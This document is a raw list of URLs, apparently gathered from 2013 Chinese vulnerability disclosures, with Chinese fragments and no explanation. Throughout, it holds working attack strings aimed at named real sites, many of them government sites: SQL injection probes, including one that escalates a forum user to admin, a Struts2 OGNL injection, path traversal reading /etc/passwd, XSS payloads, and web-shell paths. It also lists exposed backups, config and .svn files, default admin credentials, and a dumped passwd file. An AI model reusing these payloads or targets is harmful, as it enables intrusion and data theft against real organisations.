http://www.suning.com.cn/ListPicText.aspx?BID=17&RID=13&SID=1 http://www.suning.com.cn/ListProcure.aspx?BID=31&RID=19 http://www.suning.com.cn/ListProcure1.aspx?BID=31&RID=19 http://www.suning.com.cn/ListTitle.aspx?BID=1&p=1&RID=1 http://food.hinews.cn/wei_mhnsj.php?xuh=11 http://food.hinews.cn/wei_mhnsj.php?xuh=11 http://food.hinews.cn/wei_mhnsj.php?xuh=11 http://hz.zhujia360.com/loupan/all-keydfds%27%20or%201=%271 http://weboa.gto365.com/ http://weboa.gto365.com/e3oa/main.asp http://weboa.gto365.com/e3oa/gonggao/filelist.asp?type=1 http://www.dianping.com/upload/shop/2184646 http://m.ku6.com http://suntv.ku6.com http://219.143.235.52:80/ http://219.143.235.52:80/ http://www.zteict.com/news.aspx?id=91%20and%201=1 http://www.zteict.com/news.aspx?id=91%20and%201=2 http://www.zteict.com/GenericErrorPage.htm?aspxerrorpath=/news.aspx http://trip.dahe.cn/trip.dahe.cn.tar.gz http://sh.dahe.cn/sh.dahe.cn.tar.gz http://bang.dahe.cn/robots.txt/a.php http://jdms.dahe.cn/robots.txt/a.php http://117.121.58.108:8080/login http://117.121.58.109:8080/login http://58.83.158.54/ http://myphoto.tech.sina.com.cn/p/gallery.php?uid=2091776904 http://58.56.128.89/security/loginInit.action http://www.cfi.cn/drawtext.aspx?type=channel&ttype=sub&catid=A0A1A8A1172A1176 http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf[/flash http://somd5.com/index.php?act=xss http://appuu.cn/app_detail.do?appId=19411 http://www.bjbfjxw.cn http://www.bjbfjxw.cn/list.asp?type=2&userid=20860168&sort=法规培训 http://edm.org.hc360.com/manage/login/userlogin www.cnaaa.com http://您服务器的IP/由于客户数量庞大,技术部较忙,VPS产品原则不提供技术支持。 http://www.lvdouke.com http://www.lvdouke.com/android.php?ac=newdetail&cname=zuixin&newid=154 demo.yyjia.com/apple.php?id=26243&ac=detail&type=iphone&cname= http://app100651769.qzoneapp.com/ http://www.jxzfcg.gov.cn/ http://115.236.99.179/template/main.jsp 
http://115.236.99.179/sys/main.action http://60.191.115.164:8080/sso/sys/main.action http://60.191.115.164:8080/sso/sys/main.action http://quote.cfi.cn/ReadImage.aspx?stockcode=cnyusd&class=BaseWhpj&img=1 http://forex.cfi.cn/drawtext.aspx?type=channel&catid=A0A1A1080A1081 http://m.cfi.cn/indexcss.aspx?nodekey=A0A4127A4579 http://industry.cfi.cn/indexcss.aspx?nodekey=A0A4127A4128 http://chat.21cn.com/admin.php http://ctech.baidu.com/ http://news.ccidnet.com/art/1032/20131123/2167.html http://bbs.m.duba.com http://bbs.m.duba.com/config/config_global.php.bak http://bbs.m.duba.com/config/config_ucenter.php.bak http://sdzc.sdeic.gov.cn/eap/】由原来的c/s模式改为b/s模式了。新开的的系统就会有可能出现Bug。 www.2@dongfang.com http://team.jj.cn/index.php http://runforlove.org.cn/info.php?id=25 http://runforlove.org.cn/info.php?id=25 http://115.182.2.134/login http://www.tudou.com/programs/view/1My_f_VmPEM/ http://ks.cqvip.com/ks.cqvip.com.rar http://www.lz.chinanews.com/ShowToday.aspx?NewsID=5559‎ http://www.lz.chinanews.com/show2.aspx?NewsId=4773 http://www.ctce.com.cn/ http://www.ctce.com.cn/root/login.asp http://bid2.ha.sgcc.com.cn http://bid2.ha.sgcc.com.cn/upgrade http://bid2.ha.sgcc.com.cn/upgrade/acu_test_QXhf9.asp;.jpg http://bid2.ha.sgcc.com.cn/WebService/upload/ http://go.microsoft.com/fwlink/?LinkId=169433 http://sdk.test2.g.uc.cn/ss"/ www.9game.cn跟UC是一个备案号 http://www.7po.com/.svn/entries http://www.decfc.dongfang.com/media/media_Display.php?Language=GB'&NID=65 http://www.decfc.dongfang.com/download/Commodity_List.php?ClassName=????????&ID=4'&Language=GB&type=class http://www.decfc.dongfang.com/download/Commodity_List.php?ID=1 http://bbsuc.duba.net http://bbsuc.duba.net/data/config.inc.php.bak http://blog.ccidnet.com/blog.php?mod=group&fid=2557 http://blog.ccidnet.com/blog.php?mod=group&fid=2557 http://blog.ccidnet.com/blog.php?mod=group&fid=2557 http://zt.100che.cn/bjlgh/photo.php?id=4 http://192.168.1.1/userRpm/config.bin 
http://target-ip/userRpm/config.bin,下载到已经加密的config.bin文件,解密即可得到该路由器账户。 http://hao.jj.cn http://www.520.net http://wap2.qiushibaike.com/login http://piao.bitauto.com/shoupiaodian/beijing.html?area=%E4%B8%9C%E5%9F%8E%E5%8C%BA http://education.ccidnet.com/ http://webservicen.it168.com/service.asmx?wsdl SOAP-ENV:Header/ SOAP-ENV:Body urn:MultiProductIdTofindArticle urn:productId urn:productId urn:articletypeId urn:articletypeId urn:pageSize urn:pageSize urn:stTime urn:stTime urn:endTime urn:endTime urn:regionalId urn:regionalId urn:pageNumber urn:pageNumber urn:MultiProductIdTofindArticle SOAP-ENV:Body SOAP-ENV:Envelope http://122.227.237.196/ http://122.227.237.196//portalPage/news!toindex.action http://wooyun.org/bugs/wooyun-2013-031912 http://aeps.sgepri.sgcc.com.cn/aeps/ch/guestbook/Login.aspx http://www.seedchina.com.cn/1.rar http://www.chinanpo.gov.cn/chinanpo.rar http://happy.enet.com.cn/php/list.php?cid=106 http://www.hyedz.gov.cn/kfqxw_info.php?rid=813 http://g.iiyi.com/med/threadlist?fid=101 www.iiyi.com/bbs/ http://www.brightfood.com/cn/news_p.aspx?Class_ID=14 http://www.brightfood.com/cn/product.aspx?Class_ID=107 http://henan.people.com.cn/gtzy/liuyan.php http://henan.people.com.cn/liuyan_online.php http://218.58.70.201/haier/sys/Login_dologin.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://vip.kangq.com/business.php?action=merchant&mid=137 www.xyj.zy.jj.cn http://www.xyj.zy.jj.cn/theme/detail?id=10005&tid=1 http://goldpen.ccidnet.com/goldpen/ URL:http://www.enjoy3c.com/admin/login http://cc.zy.jj.cn/msg/detail?id=11947 http://115.182.21.51 
http://115.182.21.51/siterank.php?ranktype=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ http://115.182.21.51/common/ http://115.182.21.51/flashchart/ http://ui.letv.com/home.php?mod=space&uid=23471696&do=album&picid=2093&goto=down#pic_block http://kf.buaa.edu.cn/index.html http://bwc.buaa.edu.cn http://bwc.buaa.edu.cn/showquestion.action http://udbms.nlsde.buaa.edu.cn http://udbms.nlsde.buaa.edu.cn/AUDRScienceWeb/downloadAction.action www.fjlyzfcg.gov.cn http://www.fjlyzfcg.gov.cn/viewbody.cfm?id=25789 http://i.360.cn/findpwd/setpwdfromemail?vc=e%2FwljiqD9WGv%2FwDyS93BghveGh%2FDYG4oMjJwcxGlcnSDZP3qIW4deYwnCpkdbCSZ3ByODXHZYDCx32A46l%2FBXxk6qo5oABIr6ZrywAoPB8DZuX81j%2Bb%2F2w%3D%3D&qid=507290669 http://i.360.cn/findpwd/setpwdfromemail?vc=e%2FwljiqD9WGv%2FwDyS93BghveGh%2FDYG4oMjJwcxGlcnSDZP3qIW4deYwnCpkdbCSZ3ByODXHZYDCx32A46l%2FBXxk6qo5oABIr6ZrywAoPB8DZuX81j%2Bb%2F2w%3D%3D&qid=507290670 http://www.woxihuan.com/ http://www.woxihuan.com/star/timeline?qid=268296138 http://i.360.cn/findpwd/setpwdfromemail?vc=e%2FwljiqD9WGv%2FwDyS93BghveGh%2FDYG4oMjJwcxGlcnSDZP3qIW4deYwnCpkdbCSZ3ByODXHZYDCx32A46l%2FBXxk6qo5oABIr6ZrywAoPB8DZuX81j%2Bb%2F2w%3D%3D&qid=268296138 www.gdww.gov.cn http://www.gdww.gov.cn/vote/result.php?VOTE_ID=14 http://www.gdww.gov.cn/vote/result.php?VOTE_ID=14 http://202.136.217.188:8086/Test/TestLogin.aspx http://ios.update.trip8080.com/iphone/v0600/orderQuery.htm http://wooyun.org/bugs/wooyun-2013-031912 http://www.google.com.tw/#newwindow=1&q=inurl:%2Fch%2Fguestbook%2FLogin.aspx http://wooyun.org/bugs/wooyun-2013-031912 http://wooyun.org/bugs/wooyun-2013-028753 inurl:TransactList.aspx?ItemName= http://58.19.178.115/waiwang/login/TransactList.aspx?ItemName=%27and/**/1/**/=/**/%28/**/select/**/@@version/**/%29/**/--/**/&LookWhat=Look http://www.ycxz.gov.cn/waiwang/login/TransactList.aspx?ItemName=%27and/**/1/**/=/**/%28/**/select/**/@@version/**/%29/**/--/**/&LookWhat=Look 
http://www.mgxzfw.gov.cn/login/TransactList.aspx?ItemName=%27and/**/1/**/=/**/%28/**/select/**/@@version/**/%29/**/--/**/&LookWhat=Look http://www.lwxzfw.gov.cn/login/TransactList.aspx?ItemName=%27and/**/1/**/=/**/%28/**/select/**/@@version/**/%29/**/--/**/&LookWhat=Look http://zwdt.yinan.gov.cn/login/TransactList.aspx?ItemName=%27and/**/1/**/=/**/%28/**/select/**/@@version/**/%29/**/--/**/&LookWhat=Look http://www.mgxzfw.gov.cn/login/TransactList.aspx?ItemName=%27and/**/1/**/=/**/%28/**/select/**/@@version/**/%29/**/--/**/&LookWhat=Look http://fed.renren.com http://ued.aili.com/?author=*(1、2、3、。。。)得到用户名 http://ued.aili.com/wp-login.php https://[马赛克]/portal/public/Registration.action https://[马赛克]/portal/BAA/Index.action http://api.zto.cn/WebService.asmx?wsdl SOAP-ENV:Header/ SOAP-ENV:Body urn:Search urn:Userid urn:Userid urn:Pwd urn:Pwd urn:SrtjobNo urn:SrtjobNo urn:Search SOAP-ENV:Body SOAP-ENV:Envelope http://183.62.54.120/proapply/login.do http://202.192.18.172:8080/proapply/login.do http://202.192.18.173/cgjsb/login.do http://localhost/cpcconsole/filelist.jsp?dir=/ http://localhost/cpcconsole/fileview.jsp?path=/etc/passwd http://zq.17173.com/dnf/act1228/list.php?button=%e6%90%9c%e7%b4%a2&na=&ord=11&tp=1 http://mds.coi.gov.cn/UploadFile/ http://mds.coi.gov.cn/test.txt http://mds.coi.gov.cn/cmdasp.asp http://weigou.baidu.com/ http://weigou.baidu.com/item?id=176584328&province=北京&query=樱花 http://report.mplife.com/ http://report.mplife.com/data/line/small/2013/11/26/1385437544300217664.jpg/1.php http://bbs.52pk.com//config/config_global.php.bak http://www.520.net http://www.vmaibo.com/timer data:text/html;base64,PHNjcmlwdD5hbGVydCgid29veXVufnRlc3QiKTwvc2NyaXB0Pg== http://skype.gmw.cn/file/d.html?fileName=SkypeSetupFull.6.11.99.102.exe http://en.100e.com/buy/register_submit.asp http://www.zy.jj.cn/ucenter/data/config.inc http://www.zy.jj.cn/static/.svn/entries http://www.zy.jj.cn/api/.svn/entries http://www.zy.jj.cn/expo/images/fair/.svn/entries 
http://www.zy.jj.cn/admin.php http://api.kuailezu.com/index.php?m=room.getHeadImage&agent_key=f0d1xxxxxxab30&agent_id=2186396&id=10458 http://libao.game.pps.tv/lbcenter/home/index?searchText=%D3%CE%CF%B7%C3%FB%B3%C6%A1%A2%C0%F1%B0%FC%C3%FB%B3%C6 http://jizhe.hinews.cn/read.php?id=290 http://project.ccidnet.com/ http://gz.ip66.com/ip66.rar http://shop.snupg.com/help/article.jsp?id=12213&nodeid=1088&siteid=42 http://hd.iiyi.com/perfection http://per.120ask.com/?c=ask_user&m=info里了、 http://www.iiyi.com/zj/zhji.php http://liuxuenote.eol.cn/index.php?country_id=4 http://tiaoji.eol.cn/end.php?info_id=223438 http://www.gzl.com.cn/ http://www.gzl.com.cn/Users/Order/Groups.aspx?OrderId=订单号 http://appapi.jiumei.com/interface.aspx http://buy.mplife.com/admin/index/login http://www.jxss.gov.cn/admin/login.aspx http://cp.g.candou.com/.svn/entries http://cee.gov.cn/admin/system/ http://a1538033451.i.sohu.com/v2/ http://www.peoplepress.net/app/message.action server:/usr/java/jdk1.6.0_11/jre/lib/amd64:/usr/java/jdk1.6.0_11/jre/../lib/amd64:/trs/trsbean:/usr/java/packages/lib/amd64:/lib:/usr/lib http://java.sun.com/ http://horizon.lenovo.com.cn/data/login http://wooyun.org/bugs/wooyun-2013-042463 http://115.182.21.31:8089/sms/ http://115.182.21.31:8089/codegen/ http://admin:admin@115.182.21.31:8089/manager/html http://202.118.201.216/daw/content.asp?conid=88 http://www.joyoung.com/upload/img.jsp https://support.dnspod.cn/Kb/showarticle/?tsid=%22%3E%3Cscript%3Ealert%28%2708sec%27%29%3C/script%3E&qtype=%E5%8A%9F%E8%83%BD%E4%BB%8B%E7%BB%8D%E5%8F%8A%E4%BD%BF%E7%94%A8%E6%95%99%E7%A8%8B http://softserver1.stock.hexun.com/TraderStar/userregister/checkmobile.php?mobile= http://www.wzjyj.gov.cn/diy.asp http://campus.app.dajie.com/m/Compus http://jlb.96211.com http://jlb.96211.com/Previous/SiteProd/ProdM_List.php?Id=398 http://jlb.96211.com/Previous/SiteProd/ProdM_List.php?Id=398 http://www.huihui.cn/ http://roc.iyoudao.net/dailyapp.php Date:2013-11-27 OS:Windows Browser:Chrome 
http://zy.jj.cn/admin.php http://hve.hep.com.cn/hep/plugin/gaozhi/test/books.jsp?resId=2388 http://vote.stcn.com/ccvc2013/tp.jsp?sid=6422 http://vote.stcn.com/ccvc2013/tp.jsp?sid=6422 http://3g.dahe.cn http://3g.dahe.cn/user/catch_list.php?cid=1 http://3g.dahe.cn/user/login.php http://www.cdgwbn.com.cn/index.php?m=Article&temp=yhsc&cate_id=13 http://www.xmgwbn.com/job/main.php?id=36 URL:http://iscm.gdtel.com.cn/shop/shop/index!index.action http://zzb.dahe.cn http://zzb.dahe.cn/fore/onclickNews.shtml?fdate=&layoutID=1 http://rol.nsfc.gov.cn/scm/index http://www.dtsrd.gov.cn/List.asp?action=list&newsclass=20 http://www.dtsrd.gov.cn/List.asp?action=list&newsclass=20 http://3g.dahe.cn http://3g.dahe.cn/user/template_list.php?cid=1 http://3g.dahe.cn/user/news_list.php?cid=1 http://e-learning.lenovo.com.cn/ask/answer/ask_id/1106 http://e-learning.lenovo.com.cn/ask/search/keyword/NVIDIA http://kabedm.lenovo.com.cn/rel20130527/admin/Login.asp http://kabedm.lenovo.com.cn/link/ http://58.215.167.153 http://km.ip66.com/Obj51Me/shouji-mod.php?id=4’ http://km.ip66.com/Obj51Me/shouji-mod.php?id=4 http://km.ip66.com/Obj51Me/shouji-mod.php?id=4 http://www.zhulang.com/w_gg_detail.php?g_id=144 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin 
pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:500:500::/home/mysql:/sbin/nologin tanght:x:501:501::/home/tanght:/bin/bash http://pan.baidu.com/pcloud/feed/getsharelist?t=1385071401108&category=0&auth_type=1&request_location=share_home&start=0&limit=60&query_uk=1513210475 http://party.vmovier.com/wp-login.php http://t.jj.cn/hd_match_enter.php?action=match_enter http://222.184.122.97/ http://222.184.122.97/broadcast.tar.gz http://222.184.122.97/cpws.tar.gz http://222.184.122.97/broadcast/bookmanage.php http://wcba.hupu.com/schedule/stats-W2014001 http://resource.stockstar.com/vote/votejs.asp?vote_id=10 http://info.stockstar.com/survey/inquiry/view.asp?answer=1&votesubmit=88952634&view=88952634&id=8599 http://eshipping.airchinacargo.com/Default.aspx http://ui.letv.com/ http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065 http://user.yeeyan.org/u/452442 http://www.cqaipu666.com/admin.php http://www.cqaipu666.com/news/pics/20131127/201311271385554895272.php;.jpg http://121.14.161.118:8022/ http://srun.com/case.html) http://ask.qyer.com/question/717459.html https://jm.jtyjy.com:8443/CDGServer3/logincontroller https://esafe.jsptpd.com:8443 https://61.141.236.16:8443 https://ticket.qdccb.com/eticket/ticketList.do http://g.csztv.cn/tuangou?cid=1 http://www.ztbest.com/manageloginztsh.aspx?action=merchant http://www.ztbest.com/biz/ProductAdd.aspx?id=201 
http://yaoguobbs.duowan.com/ http://www.258**.com/)发现发布了”【挂号机:苍海狂扫·挂机版1.5】”,说明可能存在可以进行暴力破解的接口,对其进行逆向工程后发现如下信息: http://openapi.baidu.com/oauth/2.0/authorize?response_type=code&client_id=forrwjpq8in3sihmkqw1pep3&redirect_uri=http%3a%2f%2fwww.renren.com%2fbind%2fbaidu%2fbaidulogincallback&confirm_login=2 https://openapi.baidu.com/oauth/2.0/userlogin http://job.zzuli.edu.cn/index_archives.php?search_keyword=1109059&search_type=1&actiontype=0 http://world.hupu.com/servers http://t1.world.hupu.com/?s=1 http://s1.world.hupu.com/?s=255 http://m.verycd.com/report_error/ http://htravel.haier.com/loginAction!doLogin.action http://hrois.haier.net/security/login.action http://www.3399.com http://www.3399.com/games/39706.html http://www.3399.com/games/40372.html http://app.lenovo-rel.com/admin/order http://www.heilan.com.cn/ogilvy_sys/index.php http://zdxm.ziyang.gov.cn:8580/zyxmk/login.do http://zdxm.ziyang.gov.cn:8580/zyxmk/shell.jsp http://xk.cnu.edu.cn/reportFiles/cj/cj_zwcjd.jsp http://club.jj.cn/detail/index.php?cid=2010275 http://club.jj.cn/commune_join/join.php?keywords=asdf&act=search http://www.iiyi.com/med/index.php http://hg.airchinacargo.com/index.aspx http://www.chinadami.com/ http://www.chinadami.com/show.php?nr=3&uid=9514&xid=589 http://xss.re/*** http://webqm.sysop.duowan.com:8080/ http://www.wfwj.gov.cn/wnewsView.jsp?id=739 http://www.wfwj.gov.cn/admin/ http://yz.chsi.com.cn/user/findpwd.do中, http://manage.139site.com/login.jsp http://dd.search.360buy.com/?uid=jambol http://www.huazhu.com/PointGift/ListView.aspx?giftTypeId=3&memberType=2&giftTypeId_Child=37 http://www.huazhu.com/PointGift/ListView http://www.zte-d.com/admin/index.php http://www.youdao.com/search?q=%27%7D%3Bdocument.body.innerHTML%3D%27%E5%A4%AA%E9%BB%91%E4%BA%86%27%3B%3C%2Fscript%3E&lq=%27%7D%3Bdocument.body.innerHTML%3D%27%E5%A4%AA%E9%BB%91%E4%BA%86%E2%80%98%3B%3C%2Fscript%3E&ue=utf8&T1=1385617251439&keyfrom=web.top&vendor=360z 
http://www.youdao.com/search?q=%27%7D%3Balert%28document.cookie%29%3C%2Fscript%3E&lq=%27%7D%3Bdocument.body.innerHTML%3D%27%E5%A4%AA%E9%BB%91%E4%BA%86%E2%80%98%3B%3C%2Fscript%3E&ue=utf8&T1=1385617282249&keyfrom=web.top&vendor=360z http://202.85.212.171:8088/login.action http://ww.tennis.com.cn/phpmyadmin/ http://sale.jd.com/act/rSR4ExMjOnyGwWmf.html?erpad_source=erpad http://mday.jd.com/play/fanpai.swf http://www.xxlyj.gov.cn/plus/mytag_js.php?aid=9090 http://dellcity.dell-brand.com/admin/ http://dellcity.dell-brand.com/admin/aut/aut_list.php http://223797634.show.jj.cn/myactive/ http://223797634.show.jj.cn/photo_list_newest/ http://223797634.show.jj.cn/myactive/ http://t.jj.cn/index.php?action=index www.xiaomi.com开启了登陆保护后,登陆需要输入小米安全令牌生成的验证码,若要绕过验证码只需要先从i.xiaomi.com登陆,然后刷新小米主站即可。 http://183.232.65.96:443/byqs/admin/login.action http://183.232.65.96:443/byqs/shell.jsp http://www2.easou.com:8080/2.jsp http://hr.sf-express.com/ index.php/position/list/keywords/1/lid/rid/tid/1*/10/page/2.html http://hr.sf-express.com:80/ http://show.jj.cn/ http://www.qiongzhong.gov.cn/asp_newslist.asp?ClassID=154,后进一步通过工具扫描,发现该服务器存在多处注入: http://m.jinti.com/shenghuofuwu/wap_allInfo.aspx?areaid=331 http://khd.gd118114.cn/cms/ http://khd.gd118114.cn/cms/sys/user/login.action http://lvyou.baidu.com/notes/ http://lvyou.baidu.com/notes/7292ef0ac336aec206068107 http://lvyou.baidu.com/notes/e81ecb1fabb7e03a496792a1 http://lvyou.baidu.com/notes/9c9731d883f5c6c123f371b7 http://roowei.com/js/ads.php?action=ads&ads_id= http://www.cn.roowei.com/Public/comcount.php?ac http://kf.joyoung.com/commonQuestion.html http://show.yoka.com/brandlist.php?showid=20&cityid=1 http://bbs.duba.net/forum.php?mod=viewthread&tid=22953419): http://www.qhdcgj.gov.cn/index.php?m=new_look&typeid=26&id=696 http://register.ccidnet.com/passport/passport http://app.ent.ifeng.com/constellation/admin/usrjson.php http://admin.vhost.com/Jingliban.asp http://admin.vhost.com/ http://www.taozfu.com/pview.php?id=2321 
http://www.taozfu.com/pview.php?id=660 site:taobao.com filetype:swf http://lz.taobao.com/s/febase/swf/column.swf】: http://app.114la.com/?classid=3 http://bianlun.7k7k.com http://bianlun.7k7k.com/comment.php?action=support&site=pk&aid=123&who=1&t=1385710179528 http://mms.people.com.cn http://mms.people.com.cn/music/admin/song_edit.php?id=29 http://mms.people.com.cn/music/admin/login.php http://liuxueku.people.com.cn http://liuxueku.people.com.cn/jiaoren/senddata.aspx http://ln.wap.wo.com.cn http://ln.wap.wo.com.cn/ivod/i/cc.rar http://ln.wap.wo.com.cn/ivod/i/home/Play.aspx?vid=XNDI0MjM1NTgw&cid=98 http://ln.wap.wo.com.cn/ivod/i/home/VideoType.aspx?cid=88&typename=%E6%97%85%E6%B8%B8 http://train.gw.com.cn/includes/page.php?action=article&news_id= http://www.hh010.com/ http://www.hh010.com/database/bencandy.php?fid=3&id=4842 http://eps.jiuyang.com.cn/1.txt# http://demo.xdcms.cn/index.php?m=member&f=edit http://pw.bj.happyvalley.cn/admin/AdminIndex.aspx http://www.laigang.com/Databases/myszw.mdb http://cadmin.aqgj.cn/webhome/news_content.php?id=252 http://zzenglish.cn/zzoss/login.jsp sh.qq.com/zhuanti/adv/xgl.htm http://www.cn.roowei.com/Public/comcount.php?action=up_sell&s_id=413431 http://user.roowei.com/admin http://it.sto.cn/weijinping/showbig.asp?id=46895 site:sto.cn http://www.donic-china.com/showproduct.asp?id=21 http://rates.homeinns.com/Mains.aspx?city=beijing@&hotel=010023 http://rates.homeinns.com/Mains.aspx?city=beijing@&hotel=010023 http://rates.homeinns.com/Mains.aspx?city=beijing@&hotel=010023 http://www.mayi.com/shanghai/这里,也可以是任意一个地区,点击联系房东。 http://lab.ccxx.net/admin/menu.php http://lab.ccxx.net/menu.php http://lab.ccxx.net/admin/login.php http://lab.ccxx.net/admin/inc/ http://lab.ccxx.net:80/user_modify.php?action=%24%7binjecthere%7d http://my.paidai.com/pm.php。使用短消息功能,跟任意用户发送派邮对话, http://log.17k.com/WEB-INF/applicationContext.xml http://www.hnjst.gov.cn:81 http://airchinajet.com/index.php/5167b1c10a?id=7存在注入漏洞 http://www.ddtax.gov.cn/login.asp 
user:root pass:admin http://esales.ofpay.com/index.do?mode=noticedetail&id=283645 http://www.ln-school.net/email/fujian/mm.asp http://www.ln-school.net/admin/admin_index.aspx http://cjj.dlxgdw.gov.cn/ http://cjj.dlxgdw.gov.cn/upload/mm.asp http://www.dlxgdw.gov.cn/demo.txt http://www.cqcca.com/use_detail.php?ccid=9&kid=104 http://mgs.homeinns.com/motelbbs/Default.asp http://mgs.homeinns.com/motelbbs/new.asp?Sort=1/*o*/update/*o*/bbsxp_users/*o*/set/*o*/UserRoleID=1/*o*/where/*o*/Username=0x6D00670033003100300030003300 http://lxj.ecare365.com/script/common.js http://10.123.51.83/lxjweb/service/userLogon?wsdl http://123.103.23.10/lxjweb/service/userLogon?wsdl http://yao.xywy.com//index.php?a=search&keyword= http://www.74wan.cn/game/game.php?gid=52 http://szy.gx.cn/wrShow/showNew!showNew.show http://fang.miyun360.com/common/lib/FCKeditor/editor/filemanager/upload/php/upload.php www.xiaocui.org inurl:php http://www.lufada.com.tw/product_list.php?CateId=14 http://tgksound.com.tw/prodcate.php?CateId=1 http://www.yafood.com.tw/product_detail.php?mod=item&PId=3&PPId=8&Id=191 http://www.111g.com/admin/fckeditor/editor/dialog/fck_about.html http://www.111g.com/admin/fckeditor//editor/filemanager/connectors/test.html# www.51web.com www.91zhuji.cn www.51web.com www.91zhuji.cn www.cdnhost.cn http://diysite.cdnhost.cn/company/html/?'367.html http://common.51web.com/dwr/index.html to:xywy http://58.210.35.50/push/iphone/PushHandler.ashx http://tcmobileapi.17usoft.com/MobileAPI/hotel/orderhandler.ashx http://tcmobileapi.17usoft.com/MobileAPI/hotel/orderhandler.ashx http://tcmobileapi.17usoft.com/MobileAPI/MemberShip/ContactHandler.ashx http://www.dabao.com/UserList.aspx http://www.tsjj888.com/lianluo_show.asp?id=1099 http://www.tsjj888.com/lianluo_show.asp?id=1099 http://www.tsjj888.com/admin/default.asp http://www.mayi.com/room/publish/basicinfo http://www.mayi.com/room/850067906 http://www.yinyuetai.com/fan/fan-photo-upload?fid=22885 
http://www.cae.com.cn/webfunction/webpage.aspx?nid=18e2b54de8dd444787c9766c478a53aa http://www.cae.com.cn/webfunction/tpc/TPC_Index.aspx?Mid=c19350df7b4e4f33980e039d2563aabc http://www.228.com.cn/regist/regist.html http://legc.lenovo.com/lefactory/staticContent?type=originalAvatar&filename=../../../../etc/passwd http://123.103.23.10/ http://chuangyi.lenovo.com.cn/.svn/entries http://e-learning.lenovo.com.cn/exam.tar http://auto.ynet.com/cgi/auto_photo.php?subid=680 http://gm.fengyunzhibo.com/gamble/ http://user.fengyunzhibo.com/modify.htm http://jizhe.hinews.cn/news.php?td=3 http://book.hinews.cn/archive.php?aid=541347 http://nanhai.hinews.cn/ http://hnmdjd.hinews.cn/user_info.php http://www.tpre.cntaiping.com/eng2/sub_editor_img.asp?catid=40&subcatid=9 http://www.mobage.cn/ http://gg.zzy.cn/sys/login.php http://bbs.meizu.cn http://www.xingechina.com/admin/mrzf/admin_admin.asp 